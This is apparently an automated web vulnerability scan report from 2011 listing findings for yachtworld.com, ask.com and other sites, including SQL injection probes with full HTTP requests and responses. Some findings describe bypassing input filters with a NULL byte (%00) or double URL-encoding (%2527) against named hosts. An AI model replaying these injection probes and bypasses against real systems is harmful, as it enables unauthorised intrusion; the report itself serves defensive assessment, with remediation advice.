9.60. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States

9.61. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

9.62. http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States

9.63. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States

9.64. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States

9.65. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

9.66. http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy

9.67. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

9.68. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp

9.69. https://www.yachtworld.com/

9.70. http://wzus1.ask.com/i/i.gif

10. Password field with autocomplete enabled

10.1. http://malsup.com/jquery/form/

10.2. http://malsup.com/jquery/form/

10.3. http://malsup.com/jquery/form/

10.4. http://malsup.com/jquery/form/

10.5. http://malsup.com/jquery/form/

10.6. http://malsup.com/jquery/form/

10.7. http://www.ask.com/ja-ask-dialog

10.8. http://www.ask.com/ja-ask-dialog

10.9. http://www.ask.com/ja-ask-dialog

10.10. http://www.ask.com/jsignin

10.11. http://www.ask.com/jsignin

10.12. http://www.ask.com/settings

10.13. http://www.ask.com/settings

10.14. http://www.dynamicdrive.com/forums/showthread.php

10.15. https://www.linkedin.com/secure/login

10.16. http://www.reel-time.com/forum/showthread.php

10.17. http://www.yachtworld.com/boat-loans/index.jsp

10.18. https://www.yachtworld.com/boat-loans/index.jsp

10.19. https://www.yachtworld.com/boat-loans/myLoan.jsp

11. Source code disclosure

12. Cross-domain Referer leakage

12.1. http://hire.jobvite.com/CompanyJobs/Careers.aspx

12.2. http://jqueryui.com/themeroller/

12.3. http://www.ask.com/

12.4. http://www.ask.com/

12.5. http://www.ask.com/

12.6. http://www.ask.com/

12.7. http://www.ask.com/ans

12.8. http://www.ask.com/answers

12.9. http://www.ask.com/answers/000/Notification

12.10. http://www.ask.com/homepage

12.11. http://www.ask.com/homepage

12.12. http://www.ask.com/iPhone

12.13. http://www.ask.com/ja-ask-dialog

12.14. http://www.ask.com/jsignin

12.15. http://www.ask.com/pictures

12.16. http://www.ask.com/pictureslanding

12.17. http://www.ask.com/pictureslanding

12.18. http://www.ask.com/settings

12.19. http://www.ask.com/skins

12.20. http://www.ask.com/videos

12.21. http://www.ask.com/videos

12.22. http://www.ask.com/web

12.23. http://www.ask.com/web

12.24. http://www.ask.com/web

12.25. http://www.ask.com/web

12.26. http://www.ask.com/web

12.27. http://www.ask.com/web

12.28. http://www.ask.com/web

12.29. http://www.ask.com/web

12.30. http://www.ask.com/web

12.31. http://www.ask.com/web

12.32. http://www.ask.com/web

12.33. http://www.ask.com/web

12.34. http://www.ask.com/web

12.35. http://www.ask.com/web

12.36. http://www.ask.com/webadvanced

12.37. http://www.boats.com/boat-transport/index.jsp

12.38. http://www.dynamicdrive.com/forums/showthread.php

12.39. https://www.linkedin.com/secure/login

12.40. http://www.reel-time.com/forum/showthread.php

12.41. http://www.yachtworld.com/core/globalnav/emailForm.jsp

12.42. http://www.yachtworld.com/core/help/searchHelp.jsp

12.43. http://www.yachtworld.com/core/listing/advancedSearch.jsp

12.44. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp

12.45. http://www.yachtworld.com/core/listing/cache/searchResults.jsp

12.46. http://www.yachtworld.com/core/listing/displayPhoto.jsp

12.47. http://www.yachtworld.com/core/listing/photoGallery.jsp

12.48. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

12.49. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

12.50. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

12.51. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp

12.52. http://www.yachtworld.com/core/rendering/email-boat.htm

12.53. http://www.yachtworld.com/core/sponsored-boats/search.htm

12.54. http://www.yachtworld.com/leaving_yw.cgi

12.55. http://wzus1.ask.com/r

12.56. http://wzus1.ask.com/r

12.57. http://wzus1.ask.com/r

12.58. http://wzus1.ask.com/r

13. Cross-domain script include

13.1. http://govguru.com/north-carolina/boat-registration

13.2. http://hire.jobvite.com/CompanyJobs/Careers.aspx

13.3. http://jqueryui.com/about

13.4. http://jqueryui.com/themeroller/

13.5. http://malsup.com/jquery/cycle/

13.6. http://malsup.com/jquery/form/

13.7. http://www.ask.com/

13.8. http://www.ask.com/about

13.9. http://www.ask.com/about/legal/privacy

13.10. http://www.ask.com/about/legal/terms

13.11. http://www.ask.com/advertise

13.12. http://www.ask.com/answers

13.13. http://www.ask.com/answers/000/Notification

13.14. http://www.ask.com/homepage

13.15. http://www.ask.com/jsignin

13.16. http://www.ask.com/pictures

13.17. http://www.ask.com/pictureslanding

13.18. http://www.ask.com/questionoftheday

13.19. http://www.ask.com/settings

13.20. http://www.ask.com/videos

13.21. http://www.ask.com/web

13.22. http://www.boats.com/boat-transport/index.jsp

13.23. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html

13.24. http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/

13.25. http://www.dynamicdrive.com/forums/showthread.php

13.26. http://www.reel-time.com/forum/showthread.php

13.27. http://www.yachtworld.com/boat-content/2011/01/a-new-bertram-flagship-the-800/

13.28. http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp

13.29. http://www.yachtworld.com/boat-loans/finance/rates.jsp

13.30. http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp

13.31. http://www.yachtworld.com/boat-loans/index.jsp

13.32. http://www.yachtworld.com/boat-loans/partner_program.jsp

13.33. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

13.34. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States

13.35. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

13.36. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

13.37. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html

13.38. https://www.yachtworld.com/boat-loans/forgot_password.jsp

13.39. https://www.yachtworld.com/boat-loans/index.jsp

13.40. https://www.yachtworld.com/boat-loans/myLoan.jsp

14. File upload functionality

15. Email addresses disclosed

15.1. http://govguru.com/common/res/js/s_code.js

15.2. http://hire.jobvite.com/CompanyJobs/careers_8.js

15.3. http://jqueryui.com/about

15.4. http://www.ask.com/about/legal/terms

15.5. http://www.ask.com/advertise

15.6. http://www.reel-time.com/forum/showthread.php

15.7. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

15.8. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

15.9. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

15.10. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States

15.11. http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States

15.12. http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States

15.13. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States

15.14. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

15.15. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

15.16. http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States

15.17. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

15.18. http://www.yachtworld.com/boats/category/type/builder/model/United+States

15.19. http://www.yachtworld.com/boats/category/type/builder/model/United+States/

15.20. http://www.yachtworld.com/boats/category/type/builder/model/United+States/California/1

15.21. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Connecticut/1

15.22. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Florida/1

15.23. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maine/1

15.24. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Maryland/1

15.25. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Massachusetts/1

15.26. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Michigan/1

15.27. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+Jersey/1

15.28. http://www.yachtworld.com/boats/category/type/builder/model/United+States/New+York/1

15.29. http://www.yachtworld.com/boats/category/type/builder/model/United+States/North+Carolina/1

15.30. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Ohio/1

15.31. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Rhode+Island/1

15.32. http://www.yachtworld.com/boats/category/type/builder/model/United+States/South+Carolina/1

15.33. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Texas/1

15.34. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1

15.35. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Washington/1

15.36. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1

15.37. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_CA.html.en

15.38. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_FL.html.en

15.39. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_NY.html.en

15.40. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_TX.html.en

15.41. http://www.yachtworld.com/core/globalnav/privacy.jsp

15.42. http://www.yachtworld.com/core/globalnav/termOfUse.jsp

15.43. http://www.yachtworld.com/core/gzip_1874314158/bundles/ywTemplate1Bundle.js

15.44. http://www.yachtworld.com/core/listing/cache/searchResults.jsp

15.45. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.46. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.47. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.48. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.49. http://www.yachtworld.com/core/listing/pl_boat_detail.jsp

15.50. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp

15.51. http://www.yachtworld.com/core/rendering/email-boat.htm

15.52. http://www.yachtworld.com/core/rendering/print-boat.htm

15.53. http://www.yachtworld.com/core/rendering/print-boat.htm

15.54. https://www.yachtworld.com/core/globalnav/privacy.jsp

15.55. https://www.yachtworld.com/core/globalnav/termOfUse.jsp

15.56. https://www.yachtworld.com/core/listing/cache/searchResults.jsp

16. Cacheable HTTPS response

16.1. https://www.yachtworld.com/

16.2. https://www.yachtworld.com/boat-loans/forgot_password.jsp

16.3. https://www.yachtworld.com/boat-loans/index.jsp

16.4. https://www.yachtworld.com/boat-loans/myLoan.jsp

16.5. https://www.yachtworld.com/byp/categories/BrokerageSales/BoatDealers.html.en

16.6. https://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms.html.en

16.7. https://www.yachtworld.com/byp/categories/Surveyors/index.html.en

16.8. https://www.yachtworld.com/byp/searchbyp.cgi.en

16.9. https://www.yachtworld.com/core/globalnav/contactUs.jsp

16.10. https://www.yachtworld.com/core/globalnav/copyright.jsp

16.11. https://www.yachtworld.com/core/globalnav/emailForm.jsp

16.12. https://www.yachtworld.com/core/globalnav/help.jsp

16.13. https://www.yachtworld.com/core/globalnav/localeSelect.jsp

16.14. https://www.yachtworld.com/core/globalnav/privacy.jsp

16.15. https://www.yachtworld.com/core/globalnav/termOfUse.jsp

16.16. https://www.yachtworld.com/core/listing/advancedSearch.jsp

16.17. https://www.yachtworld.com/core/listing/cache/searchResults.jsp

16.18. https://www.yachtworld.com/core/personalboatshopper/pbs.jsp

16.19. https://www.yachtworld.com/core/services/services.jsp

16.20. https://www.yachtworld.com/globalnav/sitemap.html.en

16.21. https://www.yachtworld.com/leaving_yw.cgi

17. HTML does not specify charset

17.1. http://ads.pointroll.com/PortalServe/

17.2. http://jqueryui.com/about

17.3. http://jqueryui.com/themeroller/

17.4. http://www.boats.com/includes/script_declarations.jsp

17.5. http://wzus1.ask.com/i/b.html

17.6. http://wzus1.ask.com/i/i.gif

17.7. http://wzus1.ask.com/r

18. Content type incorrectly stated

18.1. http://ss.ask.com/favicon.ico

18.2. http://ss.ask.com/query

18.3. http://www.boats.com/includes/script_declarations.jsp

18.4. http://www.yachtworld.com/clarkslanding/images/e323276.jpg

18.5. http://www.yachtworld.com/clarkslanding/images/e86210.jpg

18.6. http://www.yachtworld.com/core/recentlyviewedboatsSRP

19. Content type is not specified



1. SQL injection  next
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s41495727926958 [REST URL parameter 5]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s41495727926958

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/deyachtworld/1/H.17%00'/s41495727926958?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A25%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2266476&v32=2266476&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156025554%7C1298748025554%3B%20s_lv%3D1296156025556%7C1390764025556%3B%20s_lv_s%3DFirst%2520Visit%7C1296157825556%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:32:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 424
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld/1/H.17 was not found on this serve
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld/1/H.17%00''/s41495727926958?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A25%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2266476&v32=2266476&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156025554%7C1298748025554%3B%20s_lv%3D1296156025556%7C1390764025556%3B%20s_lv_s%3DFirst%2520Visit%7C1296157825556%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:32:04 GMT
Server: Omniture DC/2.0.0
xserver: www653
Content-Length: 0
Content-Type: text/html


1.2. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s42079387209378 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s42079387209378

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/deyachtworld%00'/1/H.17/s42079387209378?AQB=1&ndh=1&t=27/0/2011%2013%3A25%3A11%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/southpaw/&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&c23=Thursday&c24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/southpaw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_sess=%20s_sq%3D%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156311019%7C1298748311019%3B%20s_lv%3D1296156311021%7C1390764311021%3B%20s_lv_s%3DFirst%2520Visit%7C1296158111021%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:16 GMT
Server: Omniture DC/2.0.0
Content-Length: 417
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld%00''/1/H.17/s42079387209378?AQB=1&ndh=1&t=27/0/2011%2013%3A25%3A11%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/southpaw/&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&c23=Thursday&c24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/southpaw/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.7.10.1296155835; s_sess=%20s_sq%3D%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156311019%7C1298748311019%3B%20s_lv%3D1296156311021%7C1390764311021%3B%20s_lv_s%3DFirst%2520Visit%7C1296158111021%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:17 GMT
Server: Omniture DC/2.0.0
xserver: www260
Content-Length: 0
Content-Type: text/html


1.3. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43482092181220 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s43482092181220

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

